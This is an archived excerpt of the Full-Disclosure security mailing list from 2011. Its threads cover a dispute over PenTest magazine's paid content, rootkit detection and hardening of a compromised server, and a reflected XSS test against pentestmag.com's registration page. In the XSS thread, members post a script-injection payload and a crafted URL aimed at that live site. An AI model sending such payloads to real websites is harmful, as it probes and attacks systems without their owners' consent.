email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue. It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for full copy. Your post is misleading to say the least. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTt/QYLIvn8UFHWSmAQIzFggAnxvnG44EGxYO/cJ6lG5da8F8vlc5iMgr l+BL7VvtBklGZ8U2kzV2Rg61dWEJfBKv0qR/uqVMv1tQsj+ssfFp4ZmKRoPAjWXi V3fx1ejfxeeVxazOOHB9hi9w0L5CwR85/WWgqzdbjaN6A5odeWCnM5BMzp0nIlQX +sESl0nu/4XXBWRDW+7OeRsuOgeoiaJLagCvXy6gFqObaEjesx5A+qaq7zBbRrWJ Im77mRdSAt9N0oCWs9dlgB0bzv3Fjxo64jUCiiebt4im6bVyR646pkp8DSL7Zndc D+Ar+E7HecmdtBU7Ywnx5dxDuCu9h1V4lJ46Khxe7nBk+i5w3gg7/A== =gt1t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
...wellI guess it is 23 pages :/ but that's more annoying then if they gave out just 3 full pages On Dec 7, 2011 12:58 PM, xD 0x41 sec...@gmail.com wrote: its like a snippet from each page.. On 8 December 2011 07:56, Gage Bystrom themadichi...@gmail.com wrote: Lol I get that, but was the teaser 23 pages? On Dec 7, 2011 12:53 PM, GloW - XD doo...@gmail.com wrote: Well, it does force a registration, even for the teasers, thats rude, but yes, it does have a teaser for each issue.. still, is FD the place for these things, i dont know.. On 8 December 2011 07:51, Gage Bystrom themadichi...@gmail.com wrote: I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude. On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote: umm, its not misleading atall.. this is the first look and, i understood well, if you bother to visit the address... theyre 'teasers' so, you dont get a FULL magazine or, kit, you opnly get the first like chapter/pages, thats similar to many other *products* , not freebies... On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 07/12/2011 10:02, Olga Głowala wrote: New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks The link to download is below: http://pentestmag.com/pentest-starterkit-211-2/ http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free! Quote: Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue. It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for full copy. Your post is misleading to say the least. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTt/QYLIvn8UFHWSmAQIzFggAnxvnG44EGxYO/cJ6lG5da8F8vlc5iMgr l+BL7VvtBklGZ8U2kzV2Rg61dWEJfBKv0qR/uqVMv1tQsj+ssfFp4ZmKRoPAjWXi V3fx1ejfxeeVxazOOHB9hi9w0L5CwR85/WWgqzdbjaN6A5odeWCnM5BMzp0nIlQX +sESl0nu/4XXBWRDW+7OeRsuOgeoiaJLagCvXy6gFqObaEjesx5A+qaq7zBbRrWJ Im77mRdSAt9N0oCWs9dlgB0bzv3Fjxo64jUCiiebt4im6bVyR646pkp8DSL7Zndc D+Ar+E7HecmdtBU7Ywnx5dxDuCu9h1V4lJ46Khxe7nBk+i5w3gg7/A== =gt1t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
You use everything but the compromised box, right. And that's because of the proliferation of kernel rootkits in the first place. Userland rootkits can be defeated quickly, easily, and sometimes by accident. A kernel rootkit can only realistically be beaten by other machines monitoring the network, imaging the hard drive, etc. As an attacker you increase the chances of losing by not using a kernel rootkit. Which is why if you're going for a rootkit, there's no reason to use a userland over kernel. Not to mention a kernel rootkit is in a better position to delay or prevent discovery in the first place barring good mitigations. Which is where my statement 'if you are worried about a userland kit, you must worry about a kernel rootkit. On Dec 7, 2011 1:18 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: From a computer science standpoint there's a difference, of course, but not from an investigation standpoint. Say the kernel has a rootkit and is creating files. How do you find those files? If it's opening network connections, how do you find out what those connections are and what process is tied to them? --On December 7, 2011 10:13:42 AM -0800 Gage Bystrom themadichi...@gmail.com wrote: Oh it certainly is a distinction, and that very distinction is important enough to have caused the creation of kernel rootkits in the first place: the kernel is absolute. There is nothing any software can do without the kernel. For instance say you got a guy with a userland rootkit. He wants to hide a file so ls, and several other binaries were modified. You load up python, whip up a quick script and boom you can see all the previously hidden files. Kernel kit and you have to hook a few system calls and monitor the incoming values. If it would return your file and the 'password' wasn't given, you can return bogus information and EVERY tool will fall for it. Also not everything has to be done in userland to get done. The kernel is fully capable of sending out packets, creating files, etc. Userland in fact relies on the kernel for all of these. If you get to the kernel you control all of both worlds. You get the userland and in truth you only control a portion of the userland. Mighty difference indeed. On Dec 7, 2011 7:20 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: But whether you have a kernel rootkit or not isn't all that important. In either case the system is going to be doing unwanted things, and you detect those unwanted things with the usual system utilities. If a kernel rootkit didn't affect userland, what would be its purpose? Even to transmit data offsite you have to invoke network capabilities, file system capabilities, etc. IOW, it's a distinction without difference. --On December 6, 2011 11:48:02 AM -0800 Gage Bystrom themadichi...@gmail.com wrote: My bad, should have said that you can't trust the md5sum tampering(since you stated to have a static copy on the flash drive) but you couldn't trust it since you couldn't trust the system calls. The immediate moment you have to worry about a legit userland rootkit you have to worry about a kernel rootkit. After all you have to consider the psychology of the attacker. If you were to compromise a box, and cared enough to hide a backdoor they cannot detect without static, write proof media, then you care enough to go the extra step for a kernel rootkit. Otherwise you would be spending even more time and effort to make your userland kit work to satisfaction for a far weaker hold on the box. It would simply be idiotic. And I think we can all agree that an attacker able to do either of the above is not an idiot. On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. * It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
Nice, but is it stored? Or at least reflective? On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=registerhttp://pentestmag.com/wp-login.php?action=register (XSS) e-mail: john@somewhere.com/sCrIpTsCrIpTalert(87118)/sCrIpT LOL Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
Not really. It it isn't exploitable in any sense of the word its not a vulnerability. It's akin to opening up firebug, writing the generic xss PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos. On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote: it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff.. Tomy Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04: Nice, but is it stored? Or at least reflective? On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=registerhttp://pentestmag.com/wp-login.php?action=register (XSS) e-mail: john@somewhere.com/sCrIpTsCrIpTalert(87118)/sCrIpT LOL Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
Thank you :) no where near a laptop all day. Nice work tom. Those guys are idiots indeed. On Dec 7, 2011 3:36 PM, Ferenc Kovacs tyr...@gmail.com wrote: http://pentestmag.com/wp-login.php?action=registeruser_login=john@somewhere.com%3C/sCrIpT%3E%3CsCrIpT%3Ealert(87118)%3C/sCrIpT%3E 2011/12/8 Gage Bystrom themadichi...@gmail.com Not really. It it isn't exploitable in any sense of the word its not a vulnerability. It's akin to opening up firebug, writing the generic xss PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos. On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote: it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff.. Tomy Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04: Nice, but is it stored? Or at least reflective? On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=registerhttp://pentestmag.com/wp-login.php?action=register (XSS) e-mail: john@somewhere.com/sCrIpTsCrIpTalert(87118)/sCrIpT LOL Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
Slightly hard to understand what you're saying but I think I get the point. Reminds me of a qoute from someone No self respecting hacker would use Wordpress. Can't remember where I read that. On Dec 7, 2011 3:41 PM, xD 0x41 sec...@gmail.com wrote: ah k, i have not really looked at it but ye, xss has never ranked to highly with me... but, i guess if it were to be defaced, then people would probably cal it *hacked* lol... i guess people dont get it yet, no one uses theyre web box, as theyre actual, 'safe' ox...not anyone i know. anyhow ye.. i dont know much in the area, but, id hate to be pwnd thru a login.php :s 2011/12/8 Gage Bystrom themadichi...@gmail.com: Not really. It it isn't exploitable in any sense of the word its not a vulnerability. It's akin to opening up firebug, writing the generic xss PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos. On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote: it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff.. Tomy Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04: Nice, but is it stored? Or at least reflective? On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=register (XSS) e-mail: john@somewhere.com/sCrIpTsCrIpTalert(87118)/sCrIpT LOL Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
What are you talking about? The entire time I asked questions cause I wasn't in a position to check myself. The Wordpress qoute was just a reference to the frequent vulnerabilities in plugins and themes. I didn't give a rat ass if the site was secure or not, I was asking questions to confirm if it was a vuln or not. On Dec 7, 2011 4:03 PM, Christian Sciberras uuf6...@gmail.com wrote: Gage, if you had the good sense of looking around before talking blindly, you'd have noticed these guys are using a 3rd party plugin called ym_reg_form, probably from these other guyshttp://www.yourmembers.co.uk/ . By that standard, Wordpress is as safe as Linux running sshd root:root, 24/7. On the other hand, this doesn't excuse these people from checking their own software. Paying for something that happened to be shit isn't an excuse either. Chris. 2011/12/8 Gage Bystrom themadichi...@gmail.com Slightly hard to understand what you're saying but I think I get the point. Reminds me of a qoute from someone No self respecting hacker would use Wordpress. Can't remember where I read that. On Dec 7, 2011 3:41 PM, xD 0x41 sec...@gmail.com wrote: ah k, i have not really looked at it but ye, xss has never ranked to highly with me... but, i guess if it were to be defaced, then people would probably cal it *hacked* lol... i guess people dont get it yet, no one uses theyre web box, as theyre actual, 'safe' ox...not anyone i know. anyhow ye.. i dont know much in the area, but, id hate to be pwnd thru a login.php :s 2011/12/8 Gage Bystrom themadichi...@gmail.com: Not really. It it isn't exploitable in any sense of the word its not a vulnerability. It's akin to opening up firebug, writing the generic xss PoC and calling the site vulnerable :P I'd love to bash on these guys as much as you want to, but let it be a real vulnerability. If it is one, then kudos. On Dec 7, 2011 3:16 PM, Tomy supp...@vs-db.info wrote: it does not matter, it's about the fact that someone who publishes such a newspaper should know his stuff.. Tomy Wiadomość napisana przez Gage Bystrom w dniu 8 gru 2011, o godz. 00:04: Nice, but is it stored? Or at least reflective? On Dec 7, 2011 2:59 PM, Tomy supp...@vs-db.info wrote: still vulnerable: sample: http://pentestmag.com:80/wp-login.php?action=register (XSS) e-mail: john@somewhere.com/sCrIpTsCrIpTalert(87118)/sCrIpT LOL Wiadomość napisana przez xD 0x41 w dniu 7 gru 2011, o godz. 23:30: Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Tomy supp...@vs-db.info ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
Ahh I see. Then yeah I would advise using iptables to deny as much outgoing traffic as possible and set up the chain so that all attempted traffic statistics get logged. Back that up with denying as much incoming traffic as possible. Then monitor for any spawning services with netstat. Assuming no rootkit was involved(and I explained how unlikely that'd be), then any incoming connection to seize back the box via a backdoor would rely on a process spawning a daemon which will be caught. Any connect back backdoor will not only be stopped immediately but since you can hone in via the logged statistics you can know what remote port its looking for. Then you simply watch netstat for outgoing connections to said port and you got em. The 'tricky' part is if they have some sort of ssh based access. Contrary to some previous suggestions locking down bash and logging users is neigh useless if the attacker has remotely browsed the man pages for the client(here's a hint, you don't need to 'login' to get a shell as long as you don't mind not having a tty). Instead the remedy is fairly simple. Reinstall ssh(preferably from source) and then change every user password. If the daemon was changed, its now safe. If a password was compromised its now useless. No matter how you look at it, if no kernel rootkit was in place then any backdoor becomes fudged. From there its a simple matter of wiping /tmp of any code scripts and then dealing with the matter of the vulnerable web pages. Cause yes, even unusual side channels relying on icmp or dns queries become useless. Iptables will still record the unusual jump in stats for those and they've just handed you and potential authorities either their home box(if they're morons), or revealed another compromised server. Which means its a win win even if they tried a 'clever' trick like that. Set the right options, plug the holes, and relish in the fact they weren't serious about your box and you will be just find. On Dec 6, 2011 1:18 AM, Lucio Crusca lu...@sulweb.org wrote: Gage Bystrom wrote: I would suggest iptables but the OP stated he doesn't own the server and has no root access. If I ever stated that, it means I misused my poor english for sure... I DO have root access and I DO own the server, where the server means the *guest* OpenVZ instance. I DID configure iptables yesterday in order to block outgoing connections. What I can't do is upgrading the kernel because OpenVZ is a limited paravirtualization system where the guest kernel it's more like a stub on top of the only shared host kernel. I have no control over the host kernel, so I can't upgrade it. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
But the problem with that is it is a mentality roughly a little more then a decade old. What you described is a userland rootkit detector. Problem is no one uses userland rootkits anymore! Sure there was some recent development in managed code rootkits but it really hasn't home anywhere and is Windows centric. Not to mention your plan is totally flawed. You assume md5sum is safe to begin with. Meaning that to be remotely safe with this you have to run the script for a livecd. Meaning you have to bring down the server everytime you suspect you MAY have been compromised. Completely unacceptable for anyone other than a home user. The only way to circumvent such issues is to recreate tripwire, in which you still have the same fundemental problems tripwire has always has. I know ya mean well, but your first block of advice isn't pratical or effective. The second one the OP already did so alls well for that. :) On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation. Start with things you use to check for problems; ls, ps, fstat, sockstat, netstat, wtmp, nc, sshd, etc. It would be fairly trivial to create a simple shell script that would compare the md5sums of system binaries to the saved copies and flag anomalies. And, of course, if you can take a system offline, there are a number of bootable security distros that allow you to do extensive analysis of systems. http://www.darknet.org.uk/**2006/03/10-best-security-live-** cd-distros-pen-test-forensics-**recovery/http://www.darknet.org.uk/2006/03/10-best-security-live-cd-distros-pen-test-forensics-recovery/ In general, on Unix systems, look for oddly named directories in odd places (like /tmp, /dev, etc. and review logs that have been syslogged elsewhere for telltale signs of compromise. It's surprising how few times the shell history logs get wiped, but there are some kits out there that do that for you. Web apps and improper permissions (world writeable) are the two most frequent causes of compromises that I've seen on Unix systems. --On December 5, 2011 1:53:21 PM + Dan Ballance tzewang.do...@gmail.com wrote: Thanks for the heads-up on rkhunter Gage. Is there anything else out there atm that works as a reasonable root kit detector or is such a thing considered impossible now? I realise a skilled attack will be able to bury itself without a trace, but I'm thinking of something that can be used in less skilled breaches such as the one thought to have been identified in this thread. Sometimes something imperfect is still better than nothing I think. Also, am I correct to think that using something like tripwire is the best way to detect root kits properly, but that it obviously needs installing when the box is fresh and before it has been physically connected to a network? thanks to everyone for their valuable contributions here - much appreciated! dan :) On 5 December 2011 11:13, Gage Bystrom themadichi...@gmail.com wrote: If it was a rootkit then trying to run the outdated rkhunter would be a moot point. Whatever seizes the kernel first wins, hands down. Fortunately for him, since the bot was so easy to find in the first place and such a simple way of maintaining it, the box was clearly seized by someone who didn't give a rats ass about it. Probably a skiddie or an automated attack to begin with. As for plugging any security holes, check your httpd error logs. If you noted down the time of the bot files creation date you would look around the same time for suspicious log entries. If they were as careless in scrubbing the logs as they were holding the box it would give you a look into how it may have been compromised. If you're getting things like ../.../../../../etc/passwd then some sort of lfi vuln was likely exploited, start grepping your php files for stuff like include(), or if you're getting something like into outfile then check your mysql user permissions and don't let it have file perms, and then start grepping down for sql vulns. If it comes down to being too much of a hassle to get all the obvious vulns at least then go to your boss, admit there is an issue and that time needs to be taken to remove such legacy code as this could have been a far worse incident if it had been more targetted and the end goal wasn't a botnet. On Dec 5, 2011 3:02 AM, Dan Ballance tzewang.do...@gmail.com wrote: I'm no expert, but here's something to get you started while you wait for more experienced replies. Check for root kits: sudo apt-get install rkhunter sudo rkhunter
Re: [Full-disclosure] one of my servers has been compromized
My bad, should have said that you can't trust the md5sum tampering(since you stated to have a static copy on the flash drive) but you couldn't trust it since you couldn't trust the system calls. The immediate moment you have to worry about a legit userland rootkit you have to worry about a kernel rootkit. After all you have to consider the psychology of the attacker. If you were to compromise a box, and cared enough to hide a backdoor they cannot detect without static, write proof media, then you care enough to go the extra step for a kernel rootkit. Otherwise you would be spending even more time and effort to make your userland kit work to satisfaction for a far weaker hold on the box. It would simply be idiotic. And I think we can all agree that an attacker able to do either of the above is not an idiot. On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
Sounds pretty neat to be honest. But one thing I'm wondering is that if they have root, what's stopping them from turning that off? After all they need root to load the modules in the first place, so if they are in a position to want to do that, then they are in a position to turn that off. Granted they probably wouldn't be able to load modules till next boot(at least Id probably cry if that wasn't the case) but even that can be a win scenario depending on how they want to execute the final step. Even in the scenario that they can't unneuter root, that's even a worse situation. Marginal protection will fall in the face of what needs to be done. Namely taking that semi permanent step to neuter root could be a serious pain if suddenly you needed unneutered root again. Would likely have to take the system down to fix it. Who wants to be the guy to explain that situation to their boss? Ergo Im pretty doubtful that such an option couldn't be reversed by root and even if you can, its a pretty large risk to do so if the server is fairly important. But the hid itself could be a formidible opponent(I'm going off your word for this one), and the kernel.panic_on_oops is a good idea since at least then you can blame the shutdown on an attacker that screwed up and likely left ample evidence behind. Basically what I've been trying to say(outside of satisfying my curiosity about several good points) is that people need to pay attention to who their 'opponent' is at the moment. You remedy the problem presented by the opponent with the right response. Anything more is a waste, anything less is disastrous. Maybe that's why people like to over respond to things, to be on the safe side, but all that means is you are far more easier to figure out and predict to a skilled attacker. What's worse of you are applying fixes to things that are a nonissue to an attacker in the first place then you are in a false sense of security. Not to say that all the things mentioned have been bad ideas(I'm endorsing several of the good ones), but people need to make sure they understand what it is they are /really/ stopping or mitigating and ask themselves what is it that they should be stopping or mitigating. Good tools for the wrong job still makes them wrong tools for ones situation. On Dec 6, 2011 12:40 PM, John Jacobs flamdu...@hotmail.com wrote: Those considering Tripwire I would ask they take a look at OSSEC-HIDS; the filesystem change notification is outstanding and with inotify() support you get immediate notification of changes. The monitoring and alerting of log files is also exceptional. I am not affiliated with OSSEC in any way. http://www.ossec.net/main/about I would recommend from a rooting aspect that kernel module loading be disabled after boot. This is accomplished by removing the CAP_SYS_MODULE permission using something like lcap on older systems or by using the sysctl value of 'kernel.modules_disabled = 1'. This can save a box by preventing automatic or intentional loading of a vulnerable modules or a module-based rootkit. The sysctl value of 'kernel.panic_on_oops = 1' also is a good idea. Thanks, John ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
Maybe I'm misreading what you said, and if so please correct me, but whether or not the changes described were applied in the first place or not wouldn't change the issue that if you needed root unneutered again you would need to bring down the system. Especially if the change doesn't really solve anything in the first place and assuming that the change can't be reversed by root itself;that would defeat the whole purpose of even using that option in a security context. On Dec 6, 2011 3:05 PM, valdis.kletni...@vt.edu wrote: On Tue, 06 Dec 2011 13:20:51 PST, Gage Bystrom said: serious pain if suddenly you needed unneutered root again. Would likely have to take the system down to fix it. Who wants to be the guy to explain that situation to their boss? If the server is critical enough that you can't take it down to fix it, it should have been in an HA configuration in the first place. Who wants to be the guy to explain to the boss that you're dead in the water because of a bad system board? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] one of my servers has been compromized
Well in that case it becomes fairly sane, assuming you've safeguarded against the one of the worst case scenario like Valdis previously mentioned. There are a handful of things I can think of however that could still work, at which point depends on the attackers goals. But at that point it'd be a complete loss for the defender, and only a half victory for the attacker. After all the defender only wins if the attacker fails to accomplish his goals. The minute he changes his goals into something you've already been forced to concede to him the minute he concedes the following: I'm not getting the kernel and one of the following: I'm not modifying critical files or The intrusion has a high chance of being detected. But meh, at the point it is an unrealistic scenario anyways. An attacker who can recognize that, while going through with the decision, while being able to plan ahead, while being skilled enough to actually prepare for the plan, while actually encountering the scenario needed for the per-requisites for this to occur is perhaps the very scenario behind the everything can be hacked possibility we all inherently recognize. Oh well, anyways this thread has been very interesting to me, and I'm glad that I'm not the only one who could see how over-responding would have been completely useless to the OP. That and he likely has more than he needs to put an end to his current circumstance. On Tue, Dec 6, 2011 at 5:33 PM, John Jacobs flamdu...@hotmail.com wrote: Sounds pretty neat to be honest. But one thing I'm wondering is that if they have root, what's stopping them from turning that off? After all they need root to load the modules in the first place, so if they are in a position to want to do that, then they are in a position to turn that off. Granted they probably wouldn't be able to load modules till next boot(at least Id probably cry if that wasn't the case) but even that can be a win scenario depending on how they want to execute the Hi Gage, thank you for your reply. What you are missing is that by disabling kernel module loading you are applying a defense-in-depth strategy to prevent a *vulnerable* module from automatically loading in the first place resulting in root compromise. I believe you may not be aware that some modules are loaded automatically if a corresponding special device is accessed. Usually the userspace modprobe utility is executed though this can be controlled by the value of /proc/sys/kernel/modprobe Preventing module loading has historically be a valuable way to prevent privilege escalation or further root compromise. Such an example would be the 'ptrace' exploit, see http://www.sans.org/security-resources/malwarefaq/Ptrace.php Historically there have been various kernel modules that are vulnerable that could be loaded by userland non-root programs or access. Ubuntu likes to automatically load modules. Removing CAP_SYS_MODULE or kernel.modules_disabled=1 make good security sense. See http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=3d43321b7015387cfebbe26436d0e9d299162ea1 and http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=25354c4fee169710fd9da15f3bb2abaa24dcf933 and https://wiki.ubuntu.com/Security/Features#block-modules The goal here is defense in depth. Revocation of loading the kernel modules cannot be undone unless a system reboot is effected which should be highly suspicious. The goal isn't about protecting ones boxens from a theoretical boogie-man it is to leverage all available and sane methods for properly securing ones box. I see no point to to use these options. Thanks, John ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] distributing passwords to users
